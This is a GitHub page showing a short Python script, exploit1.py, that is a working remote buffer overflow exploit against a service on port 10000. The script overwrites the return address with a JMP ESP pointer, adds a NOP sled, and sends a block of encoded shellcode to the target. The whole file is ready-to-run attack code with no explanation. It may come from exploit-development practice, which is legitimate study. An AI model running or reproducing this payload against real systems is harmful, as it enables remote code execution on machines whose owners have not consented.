-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit1.py
executable file
·37 lines (29 loc) · 1.5 KB
/
exploit1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/python
import socket, sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1],10000))
buffer = 268*"A"
buffer += "\x0A\xaf\xd5\x77" #EIP contains JMP ESP in some .DLL
buffer += "\x90"*25
buffer += ("\xba\xb3\xa7\x13\x0c\xda\xd3\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x4b\x31\x56\x14\x03\x56\x14\x83\xee\xfc\x51\x52\xef\xe4\x1c"
"\x9d\x10\xf5\x7e\x17\xf5\xc4\xac\x43\x7d\x74\x60\x07\xd3\x75"
"\x0b\x45\xc0\x0e\x79\x42\xe7\xa7\x37\xb4\xc6\x38\xf6\x78\x84"
"\xfb\x99\x04\xd7\x2f\x79\x34\x18\x22\x78\x71\x45\xcd\x28\x2a"
"\x01\x7c\xdc\x5f\x57\xbd\xdd\x8f\xd3\xfd\xa5\xaa\x24\x89\x1f"
"\xb4\x74\x22\x14\xfe\x6c\x48\x72\xdf\x8d\x9d\x61\x23\xc7\xaa"
"\x51\xd7\xd6\x7a\xa8\x18\xe9\x42\x66\x27\xc5\x4e\x77\x6f\xe2"
"\xb0\x02\x9b\x10\x4c\x14\x58\x6a\x8a\x91\x7d\xcc\x59\x01\xa6"
"\xec\x8e\xd7\x2d\xe2\x7b\x9c\x6a\xe7\x7a\x71\x01\x13\xf6\x74"
"\xc6\x95\x4c\x52\xc2\xfe\x17\xfb\x53\x5b\xf9\x04\x83\x03\xa6"
"\xa0\xcf\xa6\xb3\xd2\x8d\xae\x70\xe8\x2d\x2f\x1f\x7b\x5d\x1d"
"\x80\xd7\xc9\x2d\x49\xf1\x0e\x51\x60\x45\x80\xac\x8b\xb5\x88"
"\x6a\xdf\xe5\xa2\x5b\x60\x6e\x33\x63\xb5\x20\x63\xcb\x66\x80"
"\xd3\xab\xd6\x68\x3e\x24\x08\x88\x41\xee\x21\x79\x65\x42\x26"
"\x7b\x99\x74\xea\xf2\x7f\x1c\x02\x52\xd7\x89\xe0\x81\xe0\x2e"
"\x1a\xe0\x5c\xe6\x8c\xbd\x8a\x30\xb2\x3e\x99\x12\x1f\x97\x4a"
"\xe1\x73\x2c\x6a\xf6\x59\x05\xfb\x61\x17\xc7\x4e\x13\x28\xc2"
"\x3b\xd3\xbc\xe8\xed\x84\x28\xf2\xc8\xe3\xf6\x0d\x3f\x78\x3e"
"\x9b\x80\x17\x3f\x4b\x01\xe8\x69\x01\x01\x80\xcd\x71\x52\xb5")
sock.send(buffer)
sock.close()